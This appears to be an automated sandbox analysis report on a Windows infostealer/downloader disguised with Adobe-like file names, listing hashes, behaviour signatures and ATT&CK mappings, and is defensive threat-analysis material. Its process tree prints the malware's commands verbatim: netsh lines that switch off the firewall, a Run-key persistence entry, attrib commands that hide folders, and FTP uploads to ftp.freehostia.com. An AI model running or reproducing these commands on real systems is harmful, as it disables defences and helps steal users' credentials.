Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
27-08-2024 17:43
General
-
Target
c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe
-
Size
4.5MB
-
MD5
c56ba0ec71222ed7354dfaafec5cf766
-
SHA1
4922a8e60d98cb595d7e854355e9e78bb1894a61
-
SHA256
7115ea1ab97a7187b2a1bb6936fe3df44bc754ec06f70c9f880d9787e605ea60
-
SHA512
97492c5e70d7dc989e3f3a1e04a2e4afc23c5a69fbbfbb129cd2f830545fcb3bdbc5ecdb94adbb102c910d40e58564297311690a66fd945b0a497f1c02ce3d5e
-
SSDEEP
98304:Kke5WPFJWlki31xdKi+OTq9RvXODruQkckcE0VxTEJxvwPtQAfk6RwBvL0X:KWPFJob31gpeXuQkcNzVNUOHLwBj0X
Malware Config
Signatures
-
Banload
Banload variants download malicious files, then install and execute the files.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
Modifies Windows Firewall 2 TTPs 4 IoCs
-
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 8 IoCs
-
Loads dropped DLL 10 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Modifies registry class 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 10 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat" /quiet /norestart"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\"4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\RAdobe\RADBR\AREADER"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\nimiki09.vbs"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\enikiol03.bat" /quiet /norestart"5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exeAdobeta.exe -x -x -x -d -nuttyhdff -s:nuttyhdff.nuttyhdff ftp.freehostia.com -nuttyhdff6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lodhgyuuuf" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\aijw01.bat"6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all6⤵
- System Location Discovery: System Language Discovery
- Gathers network information
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exeadbr01.exe -f "011.011"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exeadbr01.exe -f "011.011"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exeadbr02.exe -f "112.112"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exeadbr02.exe -f "112.112"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode disable6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set profiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exeAdobeta.exe -a -c -d -natpasv -s:870.afr ftp.freehostia.com6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exeAdobeta.exe -a -c -d -natpasv -s:sun.afr ftp.freehostia.com6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\BReader.exeBReader 53596⤵
- Executes dropped EXE
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4B
MD54ce4d01ccc41c2e73643c40abe61aa58
SHA12dcb3b58de4e71a1febd32f789d5fb36de11cadd
SHA25609813ea33c87d6d2a4dec3c294c7c0a28a223b138f8fecb40450d696d8a3fced
SHA512f54f35d5ed2a2d97a932f7713d80b754233fdc2f343cf79460f1fd3c23363fa418dcc0250ac6826df3dc5754dda0a5ad05c8705603392d2e0ecebb7b2904cbef
-
Filesize
142B
MD5cd66461f69ae9b5d968c90f719972c41
SHA1880c320a1458a68b9be8eb957f2b224d8474bd0e
SHA2567abd65e9c543d7aa5ba69e0c6a9f125ee14766120cf4fbf48a030c2f51920878
SHA51298a136959177500ecbd56e1791b66f330831f4d87d2c9c2fe1ec58ea55cabe35c146f2a3784b747e6d01db2228cc30d3a5d55b2c3a91c3a3bd42e0f13161a1e0
-
Filesize
1KB
MD53d82b40a04974ccbafd65be06fe92c6f
SHA1fa50aeb633d719640c7f47ccb06700ca7a94f667
SHA25628905ea6324ea03ffb267bcecd18fca1e045f70a7bd5e5e54f883368736ccb59
SHA512e17b60add4ee06251f570b6bf3245cfd230f7334e4c2f609e030e9c70f24bfe87365ae7a9ac586a285b8b87f5af6e3debb8d80639143102ee2f12455b48fbd03
-
Filesize
400B
MD551e38a852a05cc9718fa3f68041e9dad
SHA1dd4bee5a01be174c3fda9904c61cfb2c41ede71c
SHA256b6e9dcb02e18ec89d3e003c56fffab57b9afb032f89f5a7826b729311938b288
SHA512197fb341edd0185948ff9739368ab0bea74012e87c9d27a67a665af50be2df7d6305b336e16cd1cec04dcca330dbbf6103d942ca9796030eb0b67fd331bea675
-
Filesize
125B
MD52a48c0bef4fca10233a53f40feda48a5
SHA142e9c79e06fa255083f307c64c2e89cda323b026
SHA256d7e97baf9575e2f20698fc0538a4003abbd4fba46389072088ed54a8d2629d13
SHA512f4f009211f93b536ce52900e795cfdb2e40dbba94c70a1156c600c7a98caa9d58dcb19e5f81ad9845a0ea03650ff3bef1267ac02d11828484b8f35423811f7eb
-
Filesize
128KB
MD5f20a3059bc40437c8dac850095b076cc
SHA19b1d118b02ab9942e9fab659329b5556190b08a0
SHA2565c75cc6d95f79d1d4a1c83b03500dbdc9d9b0b1dacdb61bbf28caf62da366c98
SHA512d2a497929e8373fb7035601654e80ed05e73282d1a909429286e6afe18344819b3e173fc5fa4d12ef3deadb8d67000b245fb98e376e3fabc2544d0b1a693ee75
-
Filesize
124KB
MD51a1075e5e307f3a4b8527110a51ce827
SHA1f453838ed21020b7ca059244feea8579e5aa74ef
SHA256ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5
SHA512b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1
-
Filesize
519B
MD5d4773871db0e4b8cad180eab60250d3f
SHA15ce9259f9dea5985013c836c56ea6182a72c618a
SHA25664681ae62fc11970f670e0d82efe4eb581cc0312d5c21b3082d7ac507543f3a6
SHA5122b1ba8a8dc26ca4003cbe8e8d0920c571c5b39e5893bc1008d5a34bbbe4922812c2c8048df76ad28fa153bcaa236e890829c59596360494082dcf2a9ee9bac45
-
Filesize
2.4MB
MD54d432bd0929e1fad42c98584dda0b9f5
SHA1c3381e2205b1e3493e28528cc3f18798c3ba5223
SHA256ffadb8953d9f92020fb9bb1d31d58aa73383ba83f8b8e762802048db2171e58c
SHA512bc5d8b1f6f1be46e91ca868320fde9fd0d9311710183e052adc7d112ec5ef42efd222d38dfea7e7292a882254ad5ff0f0dd6a6f0d6b7c8f957a23140111b9750
-
Filesize
2.2MB
MD5a754735e5ac70d33fd528b079e503ff9
SHA1d8a0069a07e9b6bd4f07eae04de331cd60f85eb8
SHA25686f299063483f6134e634d6b356eb38a8e6a779cd0f3d495d49683c0cc9e8e24
SHA512fed49537700f73abbb4cf7716d03c28010f5f69d280dc188c44c1826927f1ed247238d0983267b037a3b22a69c8668c27d3ccaa0618e303c8d930f4ccc281d9d
-
Filesize
205B
MD5426de1728c46d6b08f9ad56cf08ab872
SHA1215e41275f0a1204b3c896f7efbc49700b353950
SHA256bad31ec72d26efc643a53a2a838e14f179d3242cd6e4f85a16a0b95b17015684
SHA5129a7131b6edb1e5c2deaafd3286077af939c0abaa7a83bbd19f85de52e56a0dabd9d657281ccc026553ee8e12a6fa49fd8b95a3bcc83bb7a84b48588f25b74a4e
-
Filesize
923B
MD5d363e3b328794fe3bb4c7161b912da38
SHA1ea54f834acb70088ca03599591f20c41815b4a60
SHA25658ed7e647f6d356847c9e9a39fcfa9d5bd6dd7409a402b2162926f635f93983c
SHA5126e5f5404e78fd968c9d7f9e2dff3dbff0252dae17af70c1bc0e4589e892dca49fb9cdf3f932b1922137411bc754cc048edd71fe014dc4d93731c695bddffe61a
-
Filesize
1KB
MD5fd7c0388ca12d5d72cbdc97994d59d40
SHA1655221c41dfdc27631d4b738138bb32680022aea
SHA2568e7846031b9c738440e55b6ab1d481c17610a330d82d5467761c7e8fbf6ba38a
SHA512d6a77f0387aeae78ff929c16f0aeea82df93e81eaafcb20e05d3c080602d1fd670a5b84da9cafb031b7a546682171c54931c388734627185019c2eed5fff20e9
-
Filesize
548B
MD52246aa37b209d0f04831b3f7d9a61edc
SHA100899b4b33f264afef734f622a1cf2bf8564dd02
SHA256e0e34a17e7ac66b91149f3d744d9d765f8bc30bafe7a11c9e1cb13f881768c6d
SHA512d97935c3afe6c85cc3212ae8b8bf47dfeb108c1c79690b453efbcfde1212e7d10a379331c4d7f67be773f8d36f954ac8516ba629f86a7345ba017f63daff90cd
-
Filesize
122B
MD51fea6d4df76fb51523a03436c2a047fd
SHA16253e8fafc9cd795f72bc3aa9b988774bfb7c5d1
SHA256497f1dbd7a649f47bbd645b89be11de834a499766d239623000530d751cc83e7
SHA5125d05608daa4c6d9ac4b25fdc7df15831efbc571b594c12eada8d4b5c9a9ffe34426fc2ba0af4f7bf47253f3829077270cfb7f85cffbfb1eae12ad2bc27bba4d1
-
Filesize
2.0MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
2.0MB
-
Filesize
3.1MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
3.1MB
-
Filesize
2.0MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
304KB
-
Filesize
3.0MB
-
Filesize
304KB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.0MB
-
Filesize
304KB
-
Filesize
3.0MB
-
Filesize
304KB
-
Filesize
304KB
-
Filesize
304KB
-
Filesize
304KB
-
Filesize
3.0MB
-
Filesize
3.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
3.0MB
-
Filesize
3.0MB
-
Filesize
3.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
3.0MB
-
Filesize
3.0MB
-
Filesize
2.0MB
-
Filesize
8KB
-
Filesize
3.1MB
-
Filesize
8KB
-
Filesize
304KB
-
Filesize
304KB